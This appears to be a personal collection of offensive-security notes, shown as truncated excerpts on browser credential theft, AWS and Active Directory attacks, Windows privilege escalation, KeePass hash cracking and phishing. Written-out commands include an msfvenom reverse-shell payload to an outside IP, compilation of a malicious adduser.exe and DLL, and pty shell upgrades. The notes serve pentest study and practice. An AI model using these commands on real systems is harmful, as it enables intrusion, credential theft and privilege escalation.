Checklist: Good stuff:
CAINE can be used as a live system to perform forensic studies of a system (e.g. after a Incident).
If the system is powered off: If the system is active: If the system is a VM: Other systems: Questions:
Get hidden content from password fields Scenario: Use JavaScript for extraction. Copy and pase the following into the web browser’s console: Extract keystrokes live from a Browser Scenario: Do: Extract Cookies Scenario: Inject/Do: Extract local / session storage Like above: Stealing site passwords Scenario: Then, inject JS which adds an invisible user/username/name text field and…
Pacu can be used to test an AWS account. Setup: Unauthorized enumeration Requires only an AWS access key and secret key. Enumerate roles. Create a list with possible roles to check. run iam__enum_roles --word-list /tmp/roles.txt --account-id $accountId Enumerate users which belong to a (previously found) role. Create also a list of possible user names. run iam__enum_users --word-list…
Initial (network) enumeration Check where a service is hosted by quering the nameserver records for our target domain: host -t ns $domain Get more information / confirmation via a whois query to one previously found domain. whois $previouslyFoundDomain Check where a host is running: host $domainhost $ipFromTheDomain Check more domains of this organisation / of…
Attacking Domain Controller Synchronization The DRS Directory Replication Service is responsible to replicate a DC’s data to multiple redundant DC’s. Scenario: You own a user who has one of the following rights: Normally, users in the following groups have these (could be configured otherwise, of course): You can check with the script in Basic Active Directory…
The four process ID’s For each process, Linux manages four UID’s. When a process from a user with UID 1000 is started/forked, then the new process has normally also the UID 1000. However, with SUID/GUID it becomes more complicated, since processes can get other UIDs than the one of the caller. When a process like passwd…
Enumeration In PowerShell Caution: This command works via RDP in an interactive session, but NOT in a non-privileged bind/winrm shell. All services: PS> Get-CimInstance -ClassName win32_service | Select Name,State,PathName All running services: PS> Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}PS> Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}…
Compile it natively or not: x86_64-w64-mingw32-gcc searchedName.cpp --shared -o searchedName.dll Restart the service / application somehow and check if there is a new admin2 alive. Reflective DLL Injection See https://github.com/stephenfewer/ReflectiveDLLInjection
Binary hijacking Check if a binary (e.g. from a service) is writeable: PS C:\Users\dave> icacls "C:\xampp\apache\bin\httpd.exe"C:\xampp\apache\bin\httpd.exe BUILTIN\Administrators:(F) NT AUTHORITY\SYSTEM:(F) BUILTIN\Users:(F) NT AUTHORITY\Authenticated Users:(RX) Legend: If yes, replace it with a more useful executeable, like this one. Compile this for the correct target architecture and replace the original file. x86_64-w64-mingw32-gcc adduser.c -o adduser.exe Check this with one command:
Named pipes A named pipe is a method for remote or local IPC Inter-process communication. Basic commands Where is a program? where ssh Restart the system now: shutdown /r /t 0 Set file system attributes (which are shown with the dir command): attrib +r file.exe Set file system permissions (which are shown with the icacls command):…
The hash of a master password of a Keepass kdbx file can be extracted with keepass2john Database.kdbx > keepass.hash Then, crack it: /opt/hashcat/hashcat keepass.hash /opt/password_lists/rockyou.txt -m 13400 -r /opt/hashcat/rules/rockyou-30000.rule (!) If there is an error regarding salt, check if you have the username like “user:” at the beginning of the file. Remove it.
Short summary of techniques: Example of a manual In-memory injection Create a reverse shell payload for PowerShell: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.211 LPORT=443 -f powershell -v sc Use this PowerShell script, which injects the shellcode into the own (PowerShell) process and executes it in a new thread: Start a listener and execute it in the victim’s…
Get information from a (minified) JS (e.g. from Angular):
Files with the extension .Library-ms are similar to macOS’s Volumes. They can contain files and directory which looks like local files on the Windows Explorer. Many AV/Malware systems does not detect them currently. Create a Windows Library “Directory” Preparation: Install somewhere a DAV share which is available from the victim’s system which points to a…
Short: A user opens a link (e.g. from a phishing email) which has a injection in the URL which is then executed on the site as long as the user is logged in. See also command injections post. Classes: Tip:
See also the Web brute force post.
Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.
Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.
python -c 'import pty;pty.spawn("/bin/bash")';
python3 -c 'import pty;pty.spawn("/bin/bash")';